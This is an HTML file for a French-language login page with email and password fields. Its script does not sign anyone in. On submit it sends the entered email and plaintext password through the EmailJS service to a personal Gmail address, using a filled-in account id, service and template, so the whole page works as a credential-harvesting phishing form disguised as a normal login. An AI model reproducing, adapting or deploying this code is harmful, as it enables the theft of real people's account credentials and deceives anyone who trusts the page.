<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Page de Connexion</title>

  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f4f4f4;
    }

    .container {
      width: 50%;
      margin: auto;
      padding: 20px;
      background-color: #fff;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      margin-top: 100px;
    }

    input[type="text"], input[type="password"], input[type="submit"] {
      width: 100%;
      padding: 10px;
      margin: 8px 0;
      display: inline-block;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
    }

    input[type="submit"] {
      background-color: #4CAF50;
      color: white;
      border: none;
      cursor: pointer;
    }

    input[type="submit"]:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <div class="container">
    <h2>Connexion</h2>
    <form id="loginForm">
      <label for="email">Adresse email :</label>
      <input type="text" id="email" name="email" required>

      <label for="password">Mot de passe :</label>
      <input type="password" id="password" name="password" required>

      <input type="submit" value="Se connecter">
    </form>
    <p>Pas de compte ? <a href="/page-inscription">Créer un compte</a></p>
  </div>

  <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
  <script>
    (function() {
      emailjs.init("otwpjfwbYVYn56enm"); // Remplacez YOUR_USER_ID par votre identifiant EmailJS

      document.getElementById('loginForm').addEventListener('submit', function(event) {
        event.preventDefault();

        const email = document.getElementById('email').value;
        const password = document.getElementById('password').value;

        emailjs.send("service_3h0kgzm", "template_celwf41", {
          email: email,
          password: password,
          to_email: "Holiaboff@gmail.com"
        }).then(function(response) {
          console.log('Email envoyé avec succès!', response);
          // Vous pouvez rediriger l'utilisateur ici ou afficher un message de confirmation
        }, function(error) {
          console.error('Erreur lors de l\'envoi de l\'email:', error);
        });
      });
    })();
  </script>
</body>
</html>
